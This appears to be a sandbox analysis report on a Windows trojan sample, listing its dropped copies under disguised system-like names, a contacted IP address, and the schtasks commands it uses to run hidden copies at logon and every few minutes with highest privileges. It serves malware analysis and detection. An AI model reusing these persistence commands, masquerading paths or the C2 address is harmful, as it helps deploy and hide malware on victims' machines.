            Source: StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000277A000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.0000000002791000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030FF000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.0000000003116000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C92000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.63.98.227(
            Source: xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://92.63.98.227/Voiddb/public/TempbaseProcess/Db6centrallongpoll/publicWordpress/wordpress/Unive
            Source: xMLVfJVxhYAkoCJ.exe, 00000022.00000002.2260234358.00000000010FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.mic5
            Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000003169000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe\:Zone.Identifier:$DATA Jump to behavior
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Windows\IdentityCRL\production\51c080b3bf3cc1 Jump to behavior
            Source: XPC5PMKegV.exe, 00000000.00000000.2103762152.0000000000B66000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibcrypto$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMessageOnStart.dclib4 vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2131937856.000000001B870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2131899690.000000001B850000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2133223177.000000001C08B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2133223177.000000001C08B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2131854370.000000001B830000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe, 00000000.00000002.2128895681.0000000002D40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMessageOnStart.dclib4 vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe Binary or memory string: OriginalFilenamelibcrypto$ vs XPC5PMKegV.exe
            Source: XPC5PMKegV.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.cs Cryptographic APIs: 'CreateDecryptor'
            Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.cs Cryptographic APIs: 'TransformBlock'
            Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.cs Cryptographic APIs: 'TransformFinalBlock'
            Source: classification engine Classification label: mal100.troj.evad.winEXE@42/29@0/1
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Mutant created: NULL
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\865a90ef9879085fae9371076bbb0e052cb82423
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Users\user\AppData\Local\Temp\bNV1sCNsUH
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
            Source: XPC5PMKegV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: XPC5PMKegV.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: XPC5PMKegV.exe ReversingLabs: Detection: 78%
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe File read: C:\Users\user\Desktop\XPC5PMKegV.exe
            Source: unknown Process created: C:\Users\user\Desktop\XPC5PMKegV.exe "C:\Users\user\Desktop\XPC5PMKegV.exe"
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 5 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: unknown Process created: C:\Recovery\xMLVfJVxhYAkoCJ.exe C:\Recovery\xMLVfJVxhYAkoCJ.exe
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 10 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 6 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
            Source: unknown Process created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
            Source: unknown Process created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
            Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\System.exe "C:\Program Files (x86)\microsoft.net\System.exe"
            Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\System.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: wldp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: profapi.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: mscoree.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: version.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: uxtheme.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: windows.storage.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wldp.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: profapi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptsp.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rsaenh.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: cryptbase.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: sspicli.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: amsi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: userenv.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wbemcomn.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: iphlpapi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: dnsapi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: dhcpcsvc.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: winnsi.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: textshaping.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: textinputframework.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: coreuicomponents.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: coremessaging.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ntmarta.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: coremessaging.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wintypes.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wintypes.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: wintypes.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rasapi32.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rasman.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: rtutils.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: mswsock.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: winhttp.dll
            Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: mscoree.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: version.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exeSection loaded: uxtheme.dll
